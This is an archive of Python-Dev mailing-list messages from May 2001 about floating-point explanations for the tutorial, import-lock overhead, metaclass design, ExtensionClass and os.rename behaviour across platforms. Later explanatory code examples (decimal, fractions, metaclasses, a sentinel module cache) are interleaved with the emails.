Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>

Let's get some errors cleared up first:

+ FixedPoint is not in the distribution.

+ There is no PEP for Decimal.

+ Decimal f.p. is not more accurate than binary f.p.  In fact, it's
  provably worse (but not by much).
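Tim's third point can be seen with the `decimal` module that later joined the standard library in Python 2.4. That module is not the 2001 module Aahz mentions, and this sketch assumes its default 28-digit context. Decimal arithmetic represents 0.1 exactly, but it still rounds every inexact result, so it trades one set of surprises for another.

```python
from decimal import Decimal

# Decimal literals like 0.1 are exact in base 10 ...
print(Decimal("0.1") + Decimal("0.2") == Decimal("0.3"))   # True
print(0.1 + 0.2 == 0.3)                                    # False

# ... but 1/3 is no more exact in base 10 than 1/10 is in base 2.
third = Decimal(1) / Decimal(3)     # rounded to 28 significant digits
print(third * 3)                    # 0.9999999999999999999999999999
print(third * 3 == 1)               # False
print(1 / 3 * 3 == 1.0)             # True: binary rounding happens to cancel here
```

Neither case proves the "provably worse" claim, which concerns the worst-case spacing of representable numbers. They only show that decimal is not free of rounding.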

For the rest,

+ Yes, I'm serious about not including tutorial examples with
  platform-dependent output, unless they're explicitly meant to
  illustrate non-portable code.

+ Specific small examples notwithstanding, there is no uniformity
  across platforms in the last digit or so, because not even the IEEE-
  754 standard requires that (while C is much sloppier than 754), and
  vendors generally don't implement anything better than the minimum
  necessary when it comes to f.p. (Sun is a notable exception).

+ Happy to add text explaining the existence of surprises, and
  providing a URL.  Do the floating-point morons <wink> on Python-Dev
  find this one comprehensible?:

    http://www.lahey.com/float.htm


From guido at digicool.com  Tue May 22 00:33:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 18:33:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT."
             <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com> 
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com> 
Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com>

> + Yes, I'm serious about not including tutorial examples with
>   platform-dependent output, unless they're explicitly meant to
>   illustrate non-portable code.

Sure.  Most examples can be rewritten to avoid platform-dependent
output.  But there should be one section on floating-point
inaccuracies that shows a few of the kind of things you can expect on
a typical platform, and 1.1 -> 1.1000000000000001 is pretty common.

> + Specific small examples notwithstanding, there is no uniformity
>   across platforms in the last digit or so, because not even the IEEE-
>   754 standard requires that (while C is much sloppier than 754), and
>   vendors generally don't implement anything better than the minimum
>   necessary when it comes to f.p. (Sun is a notable exception).

So we'll have to add something like "the actual inexact output you see
may differ from the inexact output in this example".

> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I was thinking more of immortalizing this one:

http://www.python.org/cgi-bin/moinmoin/RepresentationError

This can serve as a nice self-contained section on f.p. surprises.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From MarkH at ActiveState.com  Tue May 22 01:06:39 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:06:39 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>

> > + Happy to add text explaining the existence of surprises, and
> >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> >   find this one comprehensible?:

Hey - I resemble that remark!

> >     http://www.lahey.com/float.htm

I quite liked the tone of this note.  The Python-dev morons probably could
make good sense of this, but only due to the relentless persistence of a
certain timbot.

If not for Tim, I would have forgotten completely about binary floating
point versus decimal floating point.  IIRC, me and about 40 other guys were
desperately trying to get the attention of the single CS female on the day
that lecture was given.  (Actually, that is a pretty safe bet - _all_
lectures were spent that way :)

However, without a little additional background I doubt the masses would be
able to get too far into this.

As Tim has said a few times, most people won't care - they just want it to
work!

> I was thinking more of immortalizing this one:
>
> http://www.python.org/cgi-bin/moinmoin/RepresentationError

IMO, this is a little worse.  There is less "background".  E.g., in almost the
first paragraph we see:

"""
Rewriting
    1        J
   ---  ~= ----
   10      2**N
"""

And I went "huh?  Where did J and N spring from?".  Reading a bit further
made it clear, but this document did seem a little impenetrable to floating
point or maths newbies.

It seems to me that the RepresentationError document was written for people
with a decent background in maths - exactly the sort of people who _don't_
need such a document.

Just-my-0.020000002-cents-worth ly,

Mark.


From jeremy at digicool.com  Tue May 22 01:13:09 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Mon, 21 May 2001 19:13:09 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
References: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <15113.41221.839653.822246@slothrop.digicool.com>

We looked at the SecondImport test case today.  It's a good test case
for programs that execute "import os" in a time-critical inner loop
:-).

The primary reason it is slower is the import lock that was added
after 1.5.2.  The benchmark, run in isolation, spends about 6 percent
of its time in the locking code.  Since it only spends about 20
percent of its time actually doing imports, this is a pretty
substantial cost.

It seems possible to eliminate some of the cost by using a special
marker in sys.modules that means: "This is not a module, but it's
being loaded by another thread."  But Guido doesn't sound interested
in optimizing programs with imports in inner loops.
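Jeremy's idea can be sketched in pure Python under some loudly stated assumptions. `SentinelCache` and `_LOADING` are hypothetical names, and this is not how CPython's import lock is implemented. The sketch also relies on a plain dict read being atomic, which holds under CPython's global interpreter lock. The point is that the common case, a name already in the cache, takes no lock at all.

```python
import threading

_LOADING = object()   # hypothetical marker: "being loaded by another thread"

class SentinelCache:
    """Hypothetical module cache; not CPython's actual import machinery."""

    def __init__(self, loader):
        self._loader = loader          # callable: name -> module (never None)
        self._modules = {}
        self._cond = threading.Condition()

    def get(self, name):
        mod = self._modules.get(name)
        if mod is not None and mod is not _LOADING:
            return mod                 # fast path: already loaded, no lock
        with self._cond:
            while self._modules.get(name) is _LOADING:
                self._cond.wait()      # another thread is loading it
            mod = self._modules.get(name)
            if mod is not None:
                return mod             # finished loading while we waited
            self._modules[name] = _LOADING
        try:
            mod = self._loader(name)   # run the loader without holding the lock
        except BaseException:
            with self._cond:
                del self._modules[name]
                self._cond.notify_all()
            raise
        with self._cond:
            self._modules[name] = mod
            self._cond.notify_all()
        return mod
```

A real implementation must also handle one limitation. If the loader for a name asks for the same name on the same thread, directly or indirectly, this sketch waits on itself forever.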

Jeremy


From tim at digicool.com  Tue May 22 01:20:16 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 21 May 2001 19:20:16 -0400
Subject: [Python-Dev] test_mailbox now fails on Windows
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJGCAAA.tim@digicool.com>

Appears to be because new code uses os.link, which doesn't exist on Windows.

BTW, test_urllib2.py is still failing on Windows (and has been for a couple
of weeks).


From michel at digicool.com  Tue May 22 01:42:49 2001
From: michel at digicool.com (Michel Pelletier)
Date: Mon, 21 May 2001 16:42:49 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>

On Tue, 22 May 2001, Mark Hammond wrote:

> > > + Happy to add text explaining the existence of surprises, and
> > >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> > >   find this one comprehensible?:
> 
> Hey - I resemble that remark!

As they say in the south, "mah-self"

> > >     http://www.lahey.com/float.htm
> 
> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.

I liked the tone too, but it really goes into a lot of detail, there's
this problem, and that one, oh and also *this* one and then there's *that*
and the other thing, and after a while you get the impression that
floating-point is for the insane.

> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys were
> desperately trying to get the attention of the single CS female on the day
> that lecture was given.  (Actually, that is a pretty safe bet - _all_
> lectures were spent that way :)

<sidetrack> 
The funny thing about that is we were in *Long Beach* (I
assume you mean IPC9), if you wanted to see beautiful, scarcely clothed
women in an acceptable public venue you wouldn't have had to go far, and
they would have probably had more interesting "significant bits" (it's
none of anyone's business where *I* was during the lectures ;).

Someone on the Zope list proposed P4W (Python for Women).  Poor, desperate
souls.  Obviously, P4E includes them too!!
</sidetrack>

> > I was thinking more of immortalizing this one:
> >
> > http://www.python.org/cgi-bin/moinmoin/RepresentationError
> 
> IMO, this is a little worse.

I agree.  Equations should not be needed to explain this.

-Michel


From MarkH at ActiveState.com  Tue May 22 01:47:06 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:47:06 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEIMDNAA.MarkH@ActiveState.com>

> <sidetrack>
> The funny thing about that is we were in *Long Beach* (I
> assume you mean IPC9), if you wanted to see beautiful, scarcely clothed

Actually, I meant the computer science lectures all those years ago.
Literally one female.

And-not-much-has-changed ly,

Mark.


From guido at digicool.com  Tue May 22 05:22:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:22:40 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000."
             <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com> 
References: <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com> 
Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com>

Hi Alan,

Thanks a lot for your input.  I am cc'ing this reply to python-dev
because I think my reply will be interesting for others.
(Python-dev'ers: Alan expressed concern that introducing Smalltalk
metaclasses would make Python unnecessarily complicated.)


The way my thinking is currently going, it's not likely that Python
will get a metaclass system similar to Smalltalk's.  However, unifying
types and classes is useful for other reasons: please go to
http://python.sourceforge.net/peps/ to read PEP 252 which explains how
introspection can become simpler and more powerful by unifying the
introspection mechanisms for types and classes.

There will still be metaclasses, but the metaclasses will be less
important than in Smalltalk.  Class methods as commonly seen in
Smalltalk are not high on my priority list, and the metaclass
hierarchy won't be parallelling the regular class hierarchy.  Instead,
most metaclass programming will be done in C by programmers who want
to implement alternative class policies.

For example, the current class implementation gives each class a
__dict__ for methods and class variables, and dynamically searches the
class hierarchy for methods.  An alternative inheritance policy could
merge the __dict__ of the base class(es) with the __dict__ of the
derived class at class declaration time: this would make method lookup
a single dict lookup no matter how many levels of base classes are
involved, at the cost of making classes less dynamic, because a change
to a base class won't be seen in a derived class.  A metaclass
controls method lookup and class construction, and thus a different
metaclass can be used to change this policy for selected class
hierarchies without changing the default policy (which would be
backwards incompatible).
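The flattening policy described above can be imitated in pure Python with a metaclass. This sketch uses today's `class C(metaclass=M)` syntax; in 2001 the spelling would have involved `types.TypeType`. `FlattenedMeta` is a hypothetical name. The sketch shows only the semantics (a later change to a base class is not seen by derived classes), not the speed-up, and it follows the real method resolution order closely only for single inheritance.

```python
class FlattenedMeta(type):
    """Hypothetical metaclass: copy inherited attributes into each new
    class's own __dict__ when the class statement runs."""

    def __new__(mcls, name, bases, namespace):
        merged = {}
        # Most generic classes first, so more-derived definitions win;
        # for class C(A, B), A's attributes override B's.
        for base in reversed(bases):
            for klass in reversed(base.__mro__):
                if klass is object:
                    continue
                for key, value in vars(klass).items():
                    # Skip dunder entries such as __dict__ and __module__;
                    # special methods are still found by normal inheritance.
                    if not (key.startswith("__") and key.endswith("__")):
                        merged[key] = value
        merged.update(namespace)       # the class body overrides everything
        return super().__new__(mcls, name, bases, merged)


class Base(metaclass=FlattenedMeta):
    def greet(self):
        return "base"

class Derived(Base):
    pass

print("greet" in vars(Derived))   # True: copied at class-creation time
Base.greet = lambda self: "changed"
print(Base().greet())             # changed
print(Derived().greet())          # base: Derived kept its own copy
```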

Other policies under control of a metaclass could include overriding
hooks for getattr and setattr, alternative mechanisms to store
instance variables (e.g. slot-based rather than dict-based), and so
on.

While I think I can make it possible to write metaclasses in pure
Python (by subclassing types.TypeType), I expect that most
metaprogramming will be done in C, for performance reasons and for
maximum flexibility.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Tue May 22 05:55:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:55:26 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT."
             <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com> 
Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com>

> [Guido]
> > I would like to break this down by defining the mapping between cmp()
> > and rich comparisons.

[Tim]
> Good idea!

Followed by many nitpicking questions about what I meant.  As a matter
of process, I think it's better to try to channel instead of challenge
me.  I just don't seem to have the concentration necessary to come up
with all the details needed to make this worthy of a language
definition, and you do.

If you want a BDFL proclamation on currently gray areas in the rules,
or a reversal of what the current implementation does in some cases,
please draft a definition with a few leading questions.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Tue May 22 06:02:18 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 22 May 2001 00:02:18 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKGKDAA.tim.one@home.com>

[Mark Hammond, on http://www.lahey.com/float.htm]

> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.
>
> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys
> were desperately trying to get the attention of the single CS female on
> the day that lecture was given.  (Actually, that is a pretty safe bet -
> _all_ lectures were spent that way :)

I remember guys like you.  Well guess what?  You ended up with a baby, while
I'm known on two continents as the author of tabnanny.py.  Ha!  Revenge is a
dish best eaten cold <burp>.

> However, without a little additional background I doubt the masses would
> be able to get too far into this.

There's only so much you can say to unmotivated people who are also unwilling
to learn.  That's not my problem.  Finding them a gentle intro from which
they *could* learn isn't either, but typing a URL is easy enough that I don't
mind.

Here:  I want to script MS Word with Python.  I don't know COM and refuse to
learn anything about it.  I'd rather not install win32all either, and import
statements confuse me.  Why don't you make it easy for me?  It's the same
thing -- you can point them at what they need to learn if they're serious,
else they're simply out of luck.

[And on]
>> http://www.python.org/cgi-bin/moinmoin/RepresentationError
>
> IMO, this is a little worse.

In one sense it's much worse:  it's only trying to explain a single cause of
fp surprises.  OTOH, it explains it precisely while giving the reader the
tools needed to do an exact analysis of any case of that particular class.
The Lahey link touches on all the common sources of surprises, but leaves
them fuzzy.

> There is less "background".  Eg, in almost the first paragraph we see:
>
> """
> Rewriting
>     1        J
>    ---  ~= ----
>    10      2**N
> """
>
> And I went "huh?  Where did J and N spring from?".  Reading a bit further
> made it clear, but this document did seem a little impenetrable to
> floating point or maths newbies.

It did its job for them if it simply scared them <0.5 wink>.

> It seems to me that the RepresentationError document was written for
> people with a decent background in maths -

There's nothing more complicated than integer division there.
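The integer arithmetic behind the RepresentationError page's 1/10 ~= J/2**N fits in a few lines. This sketch assumes IEEE-754 doubles with 53-bit significands. It picks the N that gives J exactly 53 bits, then rounds 2**N/10 to the nearest integer.

```python
from fractions import Fraction

# Choose N so that J = 2**N // 10 has exactly 53 bits (2**52 <= J < 2**53).
N = 0
while 2**N // 10 < 2**52:
    N += 1
q, r = divmod(2**N, 10)
# Round to nearest; r is always even, so a tie (r == 5) cannot occur.
J = q + 1 if 2 * r > 10 else q

print(N, J)                                  # 56 7205759403792794
print(Fraction(J, 2**N) == Fraction(0.1))    # True: exactly the stored 0.1
print(Fraction(J, 2**N) - Fraction(1, 10))   # 1/180143985094819840
```

The difference is positive, so the stored value is slightly larger than 1/10. That is why printing it to 17 significant digits gives 0.10000000000000001.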

> exactly the sort of people who _don't_ need such a document.

They actually do:  regardless of math background, nothing about f.p. is
obvious before studying f.p. as a subject in its own right.  It's "not like"
anything else, and in previous lives I spent a good chunk of my work time
explaining the same stuff to doctorates.  Mathematicians were actually the
hardest audience at first, perhaps because they had the hardest time
admitting they didn't already understand it; after getting beyond bruised
professional pride, though, they were the easiest audience to bring up to
speed.


From tim at digicool.com  Tue May 22 06:58:21 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 22 May 2001 00:58:21 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>

[Michel Pelletier, on http://www.lahey.com/float.htm]
> I liked the tone too, but it really goes into a lot of detail, there's
> this problem, and that one, oh and also *this* one and then there's
> *that* and the other thing, and after a while you get the impression
> that floating-point is for the insane.

Using an unfamiliar power tool with sharp edges, and while blindfolded, is
insane.

[and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]

> I agree.  Equations should not be needed to explain this.

There's exactly one equation on that page, saying that one ratio of two
integers is approximately equal to another ratio of two integers.  If that's
too much for you, and you weren't satisfied with the *initial* hand-wavy
explanation ("1/10 is not exactly representable as a binary fraction")
either, then it's up to you to do better than the latter without actually
saying anything useful <wink>:

Q:  Why is Python broken:

    >>> 0.1
    0.10000000000000001

A:  [your turn]


From gward at python.net  Tue May 22 15:41:57 2001
From: gward at python.net (Greg Ward)
Date: Tue, 22 May 2001 09:41:57 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
Message-ID: <20010522094157.A1245@gerg.ca>

On 21 May 2001, Tim Peters said:
> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I found this article more useful, interesting, and informative than
whatever I learned about binary floating-point in my academic years.
Good link, Tim.  Two catches:

  * I can just barely follow the FORTRAN examples; I very much doubt
    the average Python newbie would have any more luck than me

  * I tried several of the FORTRAN examples in Python, and did not
    witness any of the gotchas they are meant to illustrate.  Possibly
    it's just a single-precision vs. double-precision difference, but
    Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
    doesn't demonstrate the same gotchas as that article does.
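Greg's guess can be checked from Python itself, assuming the Lahey examples use single-precision REAL variables. Python floats are C doubles, but the `struct` module can round a value to 4-byte IEEE single precision and back. Doing so exposes errors around the eighth significant digit instead of the seventeenth. The helper name `to_single` is hypothetical.

```python
import struct

def to_single(x):
    """Hypothetical helper: round a Python float (a C double) to IEEE-754
    single precision and back, via the 4-byte struct format 'f'."""
    return struct.unpack('f', struct.pack('f', x))[0]

print('%.17g' % 0.1)              # 0.10000000000000001
print('%.17g' % to_single(0.1))   # 0.10000000149011612
print(abs(to_single(0.1) - 0.1))  # about 1.5e-09, versus about 5.6e-18 for the double
```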

        Greg
-- 
Greg Ward - geek                                        gward at python.net
http://starship.python.net/~gward/
Ban the bomb -- save the world for conventional warfare.


From skip at pobox.com  Tue May 22 18:01:40 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 22 May 2001 11:01:40 -0500
Subject: [Python-Dev] type/class unification and ExtensionClass
Message-ID: <15114.36196.4677.99240@beluga.mojam.com>

I know Guido has recently been working on some of the type/class unification
issues (PEPs 252 and 253).  Will this affect ExtensionClass?  In particular,
will it go away or have to be reworked significantly for Python 2.2 or 2.3?
The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
hard it would be to move away from ExtensionClass for these wrappers.  My
reading of PEP 253 suggests this shouldn't be too difficult.

I'd ask Guido directly, but I figure other people on this list might also
have useful input on the issue and/or be able to answer, saving him the
time.  At any rate, he will see it posted here just the same.

Thx,

Skip


From guido at digicool.com  Tue May 22 18:23:52 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 12:23:52 -0400
Subject: [Python-Dev] type/class unification and ExtensionClass
In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT."
             <15114.36196.4677.99240@beluga.mojam.com> 
References: <15114.36196.4677.99240@beluga.mojam.com> 
Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com>

> I know Guido has recently been working on some of the type/class unification
> issues (PEPs 252 and 253).

And I'm not done yet. :-)

> Will this affect ExtensionClass?  In particular,
> will it go away or have to be reworked significantly for Python 2.2 or 2.3?

Probably.  Jim Fulton in particular asked me to work on this because
he wants to phase out ExtensionClass.

> The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
> hard it would be to move away from ExtensionClass for these wrappers.  My
> reading of PEP 253 suggests this shouldn't be too difficult.

I don't think so either.

> I'd ask Guido directly, but I figure other people on this list might also
> have useful input on the issue and/or be able to answer, saving him the
> time.  At any rate, he will see it posted here just the same.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel at digicool.com  Tue May 22 23:44:09 2001
From: michel at digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 14:44:09 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
Message-ID: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>

On Tue, 22 May 2001, Tim Peters wrote:

> [Michel Pelletier, on http://www.lahey.com/float.htm]
> > I liked the tone too, but it really goes into a lot of detail, there's
> > this problem, and that one, oh and also *this* one and then there's
> > *that* and the other thing, and after a while you get the impression
> > that floating-point is for the insane.
> 
> Using an unfamiliar power tool with sharp edges, and while blindfolded, is
> insane.

I should have been more clear, I liked the first couple of paragraphs for
their descriptions, and there is certainly nothing wrong with the document
as it stands, but such an explanation would be a bit too lengthy and
boring to a typical fifth grader or photoshop guru going through the
Tutorial and dabbling in programming for the very first time.

> [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]
> 
> > I agree.  Equations should not be needed to explain this.
> 
> There's exactly one equation on that page, saying that one ratio of two
> integers is approximately equal to another ratio of two integers.

Who was it that said every equation will halve your audience?  I agree
with that, the tutorial should try to be as broad and simple as possible.

> If that's
> too much for you, and you weren't satisfied with the *initial* hand-wavy
> explanation ("1/10 is not exactly representable as a binary fraction")
> either, then it's up to you to do better than the latter without actually
> saying anything useful <wink>:

The latter is fine, although I think the first document hand-waves better.  

-Michel


From skip at pobox.com  Tue May 22 23:54:42 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 22 May 2001 16:54:42 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
Message-ID: <15114.57378.887742.531145@beluga.mojam.com>

Couldn't figure out why this message never generated any comment.  Turns out
it didn't reach the list because the host I sent it from
(dynamic4.tttech.com) couldn't be resolved.  I just noticed it in my errors
mailbox and am sending it out again.

------------------------------------------------------------------------------
It was brought to my attention a week ago by a client that os.rename
semantics differ between Unix and Windows.  On Unix, if the destination file
already exists it is silently deleted.  On Windows, an exception is raised.
I was able to verify this for Python 2.0 on Windows98.  I assume nothing
changed for 2.1, but I can't verify that.  (Windows trashed my partition
table and my Linux root partition while I was downloading 2.1.
Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
checked the Mac yet (will do that when I get back to the US), but I think
that os.rename should have the same semantics across all platforms.  To the
extent reasonably possible, I think this should also be true of other common
functions exposed through the os module.

On the (unsupportable) theory that to-date, more Python apps have been
written and/or deployed on Unix-like systems and that where Windows apps are
concerned, many developers will have added a thin wrapper to mimic the Unix
semantics, I think less breakage would result if the Unix semantics were
implemented in the Windows version.  It appears that is what POSIX
compliance would demand as well.
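You can check which behaviour a given platform has by trying it on scratch files. The following is a minimal sketch that assumes a modern Python 3, since `tempfile.TemporaryDirectory` did not exist in 2001. The function name is hypothetical.

```python
import os
import tempfile


def rename_overwrites_existing():
    """Return True if os.rename() silently replaces an existing destination
    on this platform (the Unix behaviour), or False if it raises OSError
    instead (the Windows behaviour)."""
    with tempfile.TemporaryDirectory() as scratch:
        src = os.path.join(scratch, "src.txt")
        dst = os.path.join(scratch, "dst.txt")
        with open(src, "w") as f:
            f.write("new")
        with open(dst, "w") as f:
            f.write("old")
        try:
            os.rename(src, dst)
        except OSError:
            return False
        # The old destination is gone; dst now holds the source's data.
        with open(dst) as f:
            assert f.read() == "new"
        return True


print(rename_overwrites_existing())  # True on Unix-like systems, False on Windows
```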

Skip


From fdrake at acm.org  Tue May 22 23:55:29 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 17:55:29 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
References: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
	<Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com>

Michel Pelletier writes:
 > as it stands, but such an explanation would be a bit too lengthy and
 > boring to a typical fifth grader or photoshop guru going through the
 > Tutorial and dabbling in programming for the very first time.

  But that's not the audience the Python Tutorial is targeted to --
readers are expected to be essentially competent in at least one "3rd
generation" language.  Maybe a few will shy away from a simple
equation, but not so many.  Those who do would do well to shy away
from FP as well.  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Wed May 23 00:04:11 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 18:04:11 -0400 (EDT)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com>
References: <15114.57378.887742.531145@beluga.mojam.com>
Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>

skip at pobox.com writes:
 > On the (unsupportable) theory that to-date, more Python apps have been
 > written and/or deployed on Unix-like systems and that where Windows apps are
 > concerned, many developers will have added a thin wrapper to mimic the Unix
 > semantics, I think less breakage would result if the Unix semantics were

  I don't know whether there are more deployed Python apps on Unix
than on Windows (and I've no good idea about how to find out), but I
think unifying the semantics one way or the other is a good thing.
Regardless of which set of semantics is chosen.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh at python.net  Wed May 23 00:07:12 2001
From: mwh at python.net (Michael Hudson)
Date: 22 May 2001 23:07:12 +0100
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)"
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>

Michel Pelletier <michel at digicool.com> writes:

> Who was it that said every equation will halve your audience?

It was Stephen Hawking's editor when he was preparing A Brief History
Of Time (or at least, it gets mentioned in the preface; the advice may
be older).

Cheers,
M.

-- 
7. It is easier to write an incorrect program than understand a
   correct one.
  -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html


From jeremy at digicool.com  Wed May 23 00:57:40 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 22 May 2001 18:57:40 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
	<m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15114.61156.692322.674137@slothrop.digicool.com>

>>>>> "MWH" == Michael Hudson <mwh at python.net> writes:

  MWH> Michel Pelletier <michel at digicool.com> writes:
  >> Who was it that said every equation will halve your audience?

  MWH> It was Stephen Hawking's editor when he was preparing A Brief
  MWH> History Of Time (or at least, it gets mentioned in the preface;
  MWH> the advice may be older).

There's a similar saw about excerpts of books in foreign languages.  I
believe I first read it in reference to Umberto Eco's Foucault's
Pendulum, which starts with a full page of Hebrew.

Jeremy


From chrishbarker at home.net  Wed May 23 01:21:01 2001
From: chrishbarker at home.net (Chris Barker)
Date: Tue, 22 May 2001 16:21:01 -0700
Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line   
 conversion?
References: <20010414192445-r01010600-f8273ce6@213.84.27.177>
Message-ID: <3B0AF45D.732126E6@home.net>

Just van Rossum wrote:

> Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't
> seem to help focussing on actual content...
> 
> Just

Just (or anyone else)

Have you made any progress on this PEP? I'd like to see it happen, so if
you haven't done it, I'll try to find the time to make a start on it
myself.

I have written a simple class that implements a line-ending-neutral text
file class. I wrote it because I have a need for it, and I thought it
would be a reasonable prototype for any syntax and methods we might want
to use in an actual implementation. I doubt anyone would find the
methods I used particularly clean or elegant (or fast) but it's the
first thing I've come up with, and it seems to work.

I've enclosed the module with this email. If that doesn't work, let me
know and I'll put it on a website.

-Chris

-- 
Christopher Barker,
Ph.D.                                                           
ChrisHBarker at home.net                 ---           ---           ---
http://members.home.net/barkerlohmann ---@@       -----@@       -----@@
                                   ------@@@     ------@@@     ------@@@
Oil Spill Modeling                ------   @    ------   @   ------   @
Water Resources Engineering       -------      ---------     --------    
Coastal and Fluvial Hydrodynamics --------------------------------------
------------------------------------------------------------------------
-------------- next part --------------
#!/usr/bin/env python

"""

TextFile.py : a module that provides a UniversalTextFile class, and a
replacement for the native python "open" command that provides an
interface to that class.

